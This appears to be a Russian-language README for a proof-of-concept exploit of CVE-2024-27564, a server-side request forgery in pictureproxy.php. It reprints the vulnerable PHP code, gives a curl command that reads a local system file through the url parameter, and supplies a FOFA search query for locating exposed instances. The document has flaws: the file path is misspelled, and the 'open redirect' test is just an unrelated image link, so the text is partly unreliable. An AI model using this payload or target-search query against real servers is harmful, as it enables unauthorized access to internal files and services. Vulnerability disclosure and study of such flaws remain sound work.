
Доказательство концепции эксплуатации для CVE-2024-27564, демонстрирующее SSRF через непроверенный параметр URL в pictureproxy.php. Включает тестирование на основе curl и поиск уязвимых экземпляров с помощью FOFA.
Этот проект демонстрирует уязвимость Server-Side Request Forgery (SSRF) в файле pictureproxy.php.
Уязвимость в pictureproxy.php позволяет удаленным злоумышленникам выполнять произвольные запросы, внедряя URL-адреса в параметр url. Эта уязвимость SSRF может быть использована без аутентификации, что делает её особенно опасной.
Уязвимый код находится в файле pictureproxy.php. Проблема возникает из-за того, что функция не проверяет должным образом параметр url. Переменная $_GET['url'] передается в функцию file_get_contents(), которая получает содержимое по указанному URL. Это может привести к SSRF.
Вот простая демонстрация концепции, показывающая, как можно эксплуатировать уязвимость:
<?php
if (isset($_GET['url'])) {
$image = file_get_contents($_GET['url']);
header("Content-type: image/jpeg");
echo $image;
} else {
echo "Invalid request";
}
Чтобы протестировать уязвимость, можно использовать следующую команду curl:
curl -i -s -k http://127.0.0.1/pictureproxy.php?url=file:///etc/password
Тест с использованием уязвимости открытого редиректа:
https://64.media.tumblr.com/f07b73b374dc2ff6d5e4dbf39d2a6467/tumblr_nvani31DCm1u5url1o1_1280.jpg
Banner
"title="ChatGPT个人专用版""
Этот проект подчеркивает важность правильной проверки пользовательских вводов для предотвращения уязвимостей SSRF. Всегда проверяйте такие параметры, как URL-адреса, перед их обработкой.